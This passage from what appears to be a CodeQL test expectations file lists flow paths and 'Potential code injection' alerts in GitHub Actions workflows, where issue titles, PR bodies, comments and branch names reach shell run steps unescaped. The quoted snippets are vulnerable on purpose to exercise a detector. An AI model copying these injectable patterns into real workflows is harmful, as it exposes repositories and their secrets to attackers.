'.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | semmle.label | Job: test3 [CHANGED-FILES] | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | semmle.label | Job: test4 [CHANGED-FILES] | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | semmle.label | Job: test3 [TITLE] | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | semmle.label | steps.ref.outputs.value | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | semmle.label | Run Step: ref [value] | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | semmle.label | echo "value=$(> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | semmle.label | Job outputs node [commit-message] | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | semmle.label | steps.commit-message.outputs.value | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | semmle.label | Run Step: commit-message [value] | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | semmle.label | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | semmle.label | Uses Step: get-pr | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | semmle.label | steps.get-pr.outputs.data | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | semmle.label | Uses Step: get-pr-details | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | semmle.label | fromJson(steps.get-pr-details.outputs.data).head.ref | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | semmle.label | Run Step: read_issue_body [body] | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | semmle.label | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | semmle.label | Uses Step: parse [data] | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | semmle.label | steps.read_issue_body.outputs.body | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | semmle.label | Job outputs node [chart-version] | +| .github/workflows/test27.yml:20:23:20:68 | steps.get-version.outputs.chart_version | semmle.label | steps.get-version.outputs.chart_version | +| .github/workflows/test27.yml:35:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test27.yml:41:9:46:2 | Run Step: get-version [chart_version] | semmle.label | Run Step: get-version [chart_version] | +| .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | 